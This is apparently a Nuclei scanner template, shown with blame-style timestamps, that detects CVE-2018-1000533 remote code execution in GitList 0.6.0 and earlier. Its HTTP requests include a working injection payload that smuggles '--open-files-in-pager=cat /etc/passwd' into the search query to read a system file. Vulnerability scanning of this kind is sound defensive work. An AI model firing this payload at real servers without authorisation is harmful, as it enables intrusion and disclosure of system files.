2021-06-15 07:28:10 +00:00
id : CVE-2018-1000533
info :
2022-04-11 14:42:35 +00:00
name : GitList < 0.6.0 Remote Code Execution
2021-06-15 07:28:10 +00:00
author : pikpikcu
severity : critical
2022-04-22 10:38:41 +00:00
description : klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.
2022-04-11 14:42:35 +00:00
reference :
- https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000533
2022-05-17 09:18:12 +00:00
- https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
- https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-1000533
cwe-id : CWE-20
2023-07-11 19:49:27 +00:00
epss-score : 0.97207
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.99732
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : gitlist
product : gitlist
tags : git,cve,cve2018,gitlist,vulhub,rce
2021-06-15 07:28:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-15 07:28:10 +00:00
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST /{{path}}/tree/a/search HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
query=--open-files-in-pager=cat%20/etc/passwd
2023-07-11 19:49:27 +00:00
matchers :
- type : word
part : body
words :
- "root:/root:/bin/bash"
2021-06-15 07:28:10 +00:00
extractors :
- type : regex
name : path
group : 1
regex :
- '<span class="name">(.*?)</span>'
2023-07-11 19:49:27 +00:00
internal : true
2021-06-15 11:08:28 +00:00
part : body